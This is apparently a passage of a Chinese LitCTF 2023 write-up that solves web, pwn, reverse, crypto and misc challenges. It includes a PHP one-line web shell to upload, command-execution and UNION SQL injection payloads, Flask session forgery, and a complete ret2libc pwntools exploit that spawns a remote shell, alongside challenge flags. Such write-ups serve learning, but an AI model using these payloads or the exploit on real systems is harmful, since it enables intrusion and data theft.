!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

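​ 这一大串只由 [ ] ( ) ! + 六种字符组成,是 JSFuck 编码,本身就是一段可以直接执行的 JavaScript 表达式;把这个编码过后的东西扔到控制台中执行就会还原(控制台里执行的代码拥有当前页面的权限,来源不明的混淆代码最好放到空白页或隔离环境里执行),拿到flag:“NSSCTF{0f7f6477-a502-49b1-b7fe-01b2439ab608}”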

7、作业管理系统

​ 先看源码,源码最后注释里说了默认的账号和密码都是admin,直接登陆:

​ 之后我不复现了,学校校园网卡我PHP马。

​ 大致说下后续咋做:直接上传php文件,内容是:

<?php system($_POST['cmd']);?>

​ 上传成功后直接读取该文件,然后post传入一个cat /flag即可。

8、Http pro max plus

​ 这题…难蚌。

​ 先是一堆请求头绕过,直接上:

User-Agent: Chrome
Client-Ip:127.0.0.1
via:Clash.win
referer: pornhub.com

​ 之后提示访问 /wtfwtfwtfwtf.php文件

​ 访问了之后看源码又要访问/sejishikong.php文件,之后得到flag:

冲完啦?拿上你的flag赶紧走NSSCTF{714b395b-2dfd-4657-8b5b-c82d04fad401}

9、Vim yyds:

​ 访问 /.index.php.swp之后通过vim -r index.php.swp获取源码(vim泄露):

<html><head><meta charset="UTF-8"><style type="text/css">body,html {display: flex;align-items: center;justify-content: center;}div.vim {display: flex;align-content: center;vertical-align: middle;justify-content: center;}img {border: none;width: 8rem;height: auto;}h1.vim_yyds {color: #50f728;display: flex;align-items: flex-start;justify-content: center;margin-top: 50;margin-left: 5px;}h3.vim_said {color: #39c2ff;display: flex;justify-content: center;align-items: center;}br,p {font-size: 20;}</style>
</head><body><main><div class="vim"><img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img><h1 class="vim_yyds">Vim yyds</h1></div><h3 class="vim_said">队里师傅说Vim是世界上最好的编辑器,不接受反驳</h3><div class="can_can_vim"><?phperror_reporting(0);$password = "Give_Me_Your_Flag";echo "<p>can can need Vim </p>";if ($_POST['password'] === base65_encode($password)) {echo "<p>Oh You got my password!</p>";eval(system($_POST['cmd']));}?></div></main>
</body>

​ 注意这儿:

<?php
// PHP fragment of index.php as recovered from the exposed Vim swap file:
// a password gate in front of a command runner.
// NOTE(review): the exposure starts with the editor swap file being served by
// the web server; dotfiles and *.swp should be denied, and nothing in the
// source should be treated as secret.
error_reporting(0); // turn off PHP error reporting
$password = "Give_Me_Your_Flag"; // hard-coded, so known to anyone who reads this source
echo "<p>can can need Vim </p>";
// NOTE(review): `base65_encode` is reproduced exactly as it appears in the
// recovered listing. PHP's built-in is base64_encode, and the request shown in
// the write-up uses the Base64 form of the password, so this is presumably a
// transcription slip — confirm against the swap file.
if ($_POST['password'] === base65_encode($password)) {
    echo "<p>Oh You got my password!</p>";
    // The 'cmd' POST parameter is handed to system() without any validation,
    // and whatever system() returns (the last line of the command's output)
    // is then evaluated as PHP by eval(): request data reaches both a shell
    // and the PHP interpreter.
    eval(system($_POST['cmd']));
}
?>

​ 把Give_Me_Your_Flag进行base64编码之后得到:R2l2ZV9NZV9Zb3VyX0ZsYWc=,之后POST传入,然后进行rce,payload如下:

password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag

​ flag:NSSCTF{550f422b-6b60-4216-828a-4521b82fe56f}

10、这是什么?SQL !注一下 !

​ 发现给了一句源码:


// Builds the lookup query by string concatenation: the raw `id` query
// parameter is placed between six opening and six closing parentheses.
// NOTE(review): $_GET["id"] is neither cast nor escaped, so the parameter
// becomes part of the SQL text; the parentheses are not a barrier because the
// request controls everything between them. The fix is to bind `id` as a
// parameter of a prepared statement (or at minimum cast it to int) — the type
// of $conn is not visible here, so the exact API call is left open.
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);

​ 由于前半部分存在多个(,因此后边需要对括号进行闭合,之后和寻常的sql注入一样:

​ 查数据库:

?id=1))))))union select 1,group_concat(schema_name) from information_schema.schemata--+

​ 查表:

?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+

​ 查字段名:

?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'--+

​ 查flag:NSSCTF{d97bb244-e6e7-4ee9-b764-2a28571532e5}

?id=1))))))union select 1,flag from ctftraining.flag--+

11、Flag点击就送!

​ 随便输入一个1,之后提示只有管理员能进,应该是Cookie伪造,那么看一下Cookie,

session=eyJuYW1lIjoiMSJ9.Zmbx8g.9zpH8poegrPcOfauIe1GtO1ht64

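​ cookie 的第一段 eyJuYW1lIjoiMSJ9 经 base64 解码就是 {"name":"1"},“内容.时间戳.签名”这种三段式格式看起来像 Flask 的签名 session:内容只做了签名,并没有加密,所以应该是session伪造。伪造需要知道签名用的key(根因就是这个key太弱、可以被猜到),猜测key为LitCTF,修改1为admin后重新签名,最后拿到flag:NSSCTF{fdbe1619-9458-4e89-84fa-6e9b308e5507}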

Pwn:

1、只需要nc一下~

​ 呜呜呜,这个题我竟然懵逼了,最后发现是在环境变量中 (>_<)。

​ 直接nc之后echo $FLAG即可获得flag:NSSCTF{548baafa-2de1-41c7-aafe-29b90be4f940}

2、口算题卡

​ nc连接之后发现是一个加减法运算(?)

root@MSI:/mnt/c/Users/20820/Downloads# nc node4.anna.nssctf.cn 28007__           ________      _________   ______       _________   ______
/_/\         /_______/\    /________/\ /_____/\     /________/\ /_____/\
\:\ \        \__.::._\/    \__.::.__\/ \:::__\/     \__.::.__\/ \::::_\/_\:\ \          \::\ \        \::\ \    \:\ \  __      \::\ \    \:\/___/\\:\ \____     _\::\ \__      \::\ \    \:\ \/_/\      \::\ \    \:::._\/\:\/___/\   /__\::\__/\      \::\ \    \:\_\ \ \      \::\ \    \:\ \\_____\___________________   \__\_____ \_____\______  \__\/     \_\//_____/\     /_____/\     /_____/\     /_____/\\:::_:\ \    \:::_ \ \    \:::_:\ \    \:::_:\ \_\:\|     \:\ \ \ \       _\:\|       /_\:\ \_______     /::_/__     \:\ \ \ \     /::_/__      \::_:\ \
/______/\    \:\____/\    \:\_\ \ \    \:\____/\    /___\:\ '
\__::::\/     \_____\/     \_____\/     \_____\/    \______/Welcome to the LitCTF2023 Verbal Problem Card!
You will be presented with 100 addition and subtraction problems.
Your goal is to answer all of them correctly to get the flag!
if you wrong, you will be kicked out of the game.
Good luck & Have fun!

​ 推测需要加减到一定数目才会出flag,试试吧,exp如下:

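import ast
import operator

from pwn import *

# The service announces "addition and subtraction problems", so only these
# operators are accepted; anything else in the received text is rejected.
_BINARY_OPS = {ast.Add: operator.add, ast.Sub: operator.sub}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def _solve(expression):
    """Evaluate an integer expression made of +, -, signs and parentheses.

    The text comes from the remote service, so it is parsed into an AST and
    only whitelisted node types are evaluated. The original script passed the
    received bytes to eval(), which would execute arbitrary Python on the
    solver's machine if the server (or anyone on the path) sent something
    other than arithmetic.

    Raises:
        ValueError: if the expression contains anything but integer
            constants, + and -.
        SyntaxError: if the text is not a valid expression at all.
    """
    def walk(node):
        # bool is a subclass of int, hence the exact type check.
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BINARY_OPS:
            return _BINARY_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError("unexpected token in arithmetic question: %r" % expression)

    return walk(ast.parse(expression.strip(), mode="eval").body)


io = remote("node4.anna.nssctf.cn", 28007)
io.recvuntil(b"Have fun!\n")
# The banner promises 100 questions, each of the form "What is <expr>?".
for _ in range(100):
    io.recvuntil(b"What is")
    question = io.recvuntil(b"?")
    # Drop the trailing "?" and compute the answer once (the original
    # evaluated the expression twice, once to send and once to print).
    answer = _solve(question[:-1].decode("ascii"))
    print(answer)
    io.sendline(str(answer).encode())
io.interactive()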

​ 最后得到flag:Congratulations! Here’s your flag:NSSCTF{757d9dc8-d946-4f97-9370-63876e41aeaf}

3、狠狠的溢出涅~

​ 检查保护:

root@MSI:/mnt/c/Users/20820/Downloads/ubuntu_pwn# checksec pwn4
[*] '/mnt/c/Users/20820/Downloads/ubuntu_pwn/pwn4'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    No canary foundNX:       NX enabledPIE:      No PIE (0x400000)

​ IDA 反编译;

// IDA decompilation of pwn4's main: prints a prompt, reads a message into a
// stack buffer, rejects it when the measured length exceeds 0x50.
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[91]; // [rsp+10h] [rbp-60h] BYREF
  unsigned __int8 v5; // [rsp+6Bh] [rbp-5h]
  int v6; // [rsp+6Ch] [rbp-4h]

  v6 = 0;
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Leave your message:");
  // Defect: up to 0x200 (512) bytes are read into a 91-byte buffer that sits
  // at rbp-0x60, so input can run past buf into v5, v6, the saved rbp and the
  // return address. The read length should be bounded by sizeof(buf).
  read(0, buf, 0x200uLL);
  // The check below happens after the write has already taken place, so it
  // cannot prevent the overflow. It is also weak as a length check: strlen()
  // stops at the first NUL byte, read() does not NUL-terminate, and the
  // result is stored in an 8-bit variable, which keeps only the low 8 bits.
  v5 = strlen(buf);
  if ( v5 > 0x50u )
  {
    puts("hacker");
    exit(0);
  }
  puts("Ok,Message Received");
  return 0;
}

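​ 发现存在栈溢出漏洞:read 最多读入 0x200 字节,而 buf 只有 91 字节。程序也有一个检查,就是用 strlen 获取buf的长度(存进 unsigned __int8 类型的 v5),然后与0x50u进行大小比较,但这个检查发生在 read 写入之后,限制不了实际写入的长度。没有后门函数,那么就是个ret2libc,直接套公式做了。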

​ 先通过puts函数泄露puts函数本身的真实地址,之后通过libc文件或者LibcSearcher库查版本拿system和/bin/sh的地址,exp如下:

# Solution script for the pwn4 exercise, as published in the write-up
# (ret2libc in two stages): stage 1 makes the program print the resolved
# address of puts and re-enter main, stage 2 uses the libc base computed from
# that value.
# The gadget and main addresses are fixed constants, which only holds because
# the binary is reported as non-PIE; the chain as a whole depends on the
# missing stack canary and the unbounded read() in main. Bounding the read,
# or building with a stack protector and PIE, each break it.
from pwn import *

context (os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux','splitw','-h','-l','140']

pwnfile = './pwn4'
elf = ELF(pwnfile)
libc = ELF('./libc-2.31.so')  # libc image whose symbol offsets are used below

#io = process(pwnfile)
io = remote('node4.anna.nssctf.cn',28607)
#gdb.attach(io)

pop_rdi = 0x4007d3  # presumably a `pop rdi; ret` gadget, judging by the name — confirm
pop_ret = 0x400556  # presumably a bare `ret` gadget — confirm
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4006B0
# Stage 1. Filler length 0x60+8: buf sits at rbp-0x60 in the decompilation,
# plus 8 bytes for the saved rbp. The filler is NUL bytes, so strlen(buf) in
# main is 0 and the `v5 > 0x50` branch is not taken.
pay = b'\x00' * (0x60+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('message:\n', pay)

# Keep the last 6 bytes of the output up to and including 0x7f and zero-extend
# them to 8 bytes before unpacking.
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
# Printed address minus the symbol's offset inside libc gives the load base.
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh\x00'))
# Stage 2. Same filler length (0x68 == 0x60+8).
# NOTE(review): the extra pop_ret entry is presumably there for 16-byte stack
# alignment before the call — confirm.
pay2 = b'\x00' * (0x68) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
io.recvuntil("message:")
io.sendline(pay2)

io.interactive()

​ flag:NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}

Re:

1、世界上最棒的程序员

​ shift+f12直接找到flag:Flag: LitCTF{I_am_the_best_programmer_ever}

2、ez_XOR:

​ 直接上源码:

// IDA decompilation of ez_XOR's main: reads a candidate flag, transforms it
// with XOR(Str1, 3) and compares the result with a constant stored in Str2.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+0h] [ebp-80h]
  const char **v5; // [esp+4h] [ebp-7Ch]
  const char **v6; // [esp+8h] [ebp-78h]
  char Str1[50]; // [esp+1Ch] [ebp-64h] BYREF
  char Str2[26]; // [esp+4Eh] [ebp-32h] BYREF
  __int16 v9; // [esp+68h] [ebp-18h]
  int v10; // [esp+6Ah] [ebp-16h]
  int v11; // [esp+6Eh] [ebp-12h]
  int v12; // [esp+72h] [ebp-Eh]
  int v13; // [esp+76h] [ebp-Ah]
  int v14; // [esp+7Ah] [ebp-6h]
  __int16 v15; // [esp+7Eh] [ebp-2h]

  __main();
  // 25 characters plus the terminating NUL fill Str2[26] exactly. The
  // expected (already transformed) value is stored in the binary itself, so
  // the check can be reversed offline.
  strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");
  v9 = 0;
  v10 = 0;
  v11 = 0;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 0;
  printf("Enter The Right FLAG:");
  // NOTE(review): "%s" has no field width, so input longer than 49 characters
  // writes past Str1[50]; a width such as %49s would bound it.
  scanf("%s", Str1);
  // Transforms Str1 in place; XOR's body is a separate function not shown in
  // this block.
  XOR(Str1, 3);
  if ( !strcmp(Str1, Str2) )
  {
    printf("U Saved IT!\n");
    return 0;
  }
  else
  {
    printf("Wrong!Try again!\n");
    // Retry by recursion; v4..v6 are never assigned in this listing.
    return main(v4, v5, v6);
  }
}

​ XOR函数如下:

// IDA decompilation of XOR: XORs every byte of Str in place with 3 * a2 and
// returns the string length measured by the last strlen() call.
// XOR with a fixed key is its own inverse, so applying the same key to the
// transformed text gives back the original text.
size_t __cdecl XOR(char *Str, char a2)
{
  size_t result; // eax
  unsigned int i; // [esp+2Ch] [ebp-Ch]

  for ( i = 0; ; ++i )
  {
    // strlen() is re-evaluated on every pass, so a byte that becomes NUL
    // after the XOR (a byte equal to the key) ends the loop early.
    result = strlen(Str);
    if ( i >= result )
      break;
    Str[i] ^= 3 * a2;
  }
  return result;
}

​ 那么,大致可以知道了:main 里调用的是 XOR(Str1, 3),而 XOR 函数里每个字节异或的是 3 * a2,也就是 9;异或是自身的逆运算,所以把E`}J]OrQF[V8zV:hzpV}fVF[t字段逐字节与9进行异或运算就能还原出输入,可以写出如下exp:

# Reverse the single-byte XOR used by the checker: it calls XOR(Str1, 3) and
# XOR applies the key 3 * a2, i.e. 9. XOR is its own inverse, so the same key
# applied to the stored constant yields the expected input.
a = "E`}J]OrQF[V8zV:hzpV}fVF[t"
b = "".join(chr(ord(symbol) ^ 9) for symbol in a)
print(b)

​ flag:LitCTF{XOR_1s_3asy_to_OR}

3、enbase64

​ 打断点动态调试一下。然后就能看到source:gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND

​ 解码即可,再看basecheck(Str1)中有str1的值,然后base64解码即可:

​ flag:LitCTF{B@5E64_l5_tooo0_E3sy!!!}

Crypto:

1、梦想是红色的 (初级)

自由友善公正公正敬业法治自由自由和谐平等自由自由公正法治诚信民主诚信自由自由诚信民主爱国友善平等诚信富强友善爱国自由诚信民主敬业爱国诚信民主友善爱国平等爱国爱国敬业敬业友善爱国公正敬业爱国敬业和谐文明诚信文明友善爱国自由诚信民主爱国爱国诚信和谐友善爱国自由友善平等爱国友善平等友善自由诚信自由平等爱国爱国敬业敬业友善爱国敬业敬业友善自由友善平等诚信自由法治诚信和谐

​ 一眼社会主义核心价值观加密,无脑梭:LitCTF{为之则易,不为则难}

2、Hex?Hex!(初级)

4c69744354467b746169313131636f6f6c6c616161217d

​ 提示hex了,无脑十六进制解密:LitCTF{tai111coollaaa!}

3、你是我的关键词(Keyworld) (初级)

IFRURC{X0S_YP3_JX_HBXV0PA}

​ 关键字加密,key是YOU,提示很明显:LITCTF{Y0U_AR3_MY_KEYW0RD}

4、家人们!谁懂啊,RSA签到都不会 (初级)

# Challenge generator: encrypts the flag with RSA and prints the parameters.
from Crypto.Util.number import *
from secret import flag

m = bytes_to_long(flag)  # flag bytes interpreted as one integer
p = getPrime(512)
q = getPrime(512)
e = 65537
n = p*q
# Plain modular exponentiation of the message itself; no padding scheme is
# applied before encryption.
c = pow(m,e,n)
# NOTE(review): p and q are the secret factors of n. Printing them hands out
# everything needed to compute the private exponent, which is why this
# challenge is solvable by direct calculation; a real system publishes only
# n and e.
print(f'p = {p}')
print(f'q = {q}')
print(f'c = {c}')
'''
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
'''

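​ 大佬直接用工具一把梭GitHub - spmonkey/Crypto 直接工具直接解密即可,我不知为啥下载不了这个工具,所以直接上答案了。其实不用工具也能算:题目直接给出了 p 和 q,先算 φ(n) = (p-1)(q-1),再求 d = e^(-1) mod φ(n),最后 m = c^d mod n,把 m 转回字节就是flag: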

​ flag:LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}

Misc:

1、What_1s_BASE (初级)

TGl0Q1RGe0tGQ19DcjR6eV9UaHVyM2RheV9WX21lXzUwfQ==

​ 直接base64解码即可:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}

2、404notfound (初级)

​ 一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}

3、这羽毛球怎么只有一半啊(恼 (初级)

​ 拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}

4、喜欢我的压缩包么 (初级)

​ 提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}

5、Take me hand (初级)

​ 流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}

6、破损的图片(初级)

​ 文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}

7、Osint小麦果汁

​ 我tm,想暴打出题人,算了,忍忍。

​ 上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}

8、easy_shark

​ 又是个欺负我010有问题,真服了,想暴打出题人。

​ 还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很像flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}

9、OSINT 探姬去哪了?_0

​ 又是社工 (T^T):


​ 根据属性中的经纬度找到了一个地方,嘉兴市秀洲区,然后高德地图搜索"嘉兴市秀洲区 电信",出现的是电信大厦,所以:LitCTF{中国电信大厦}
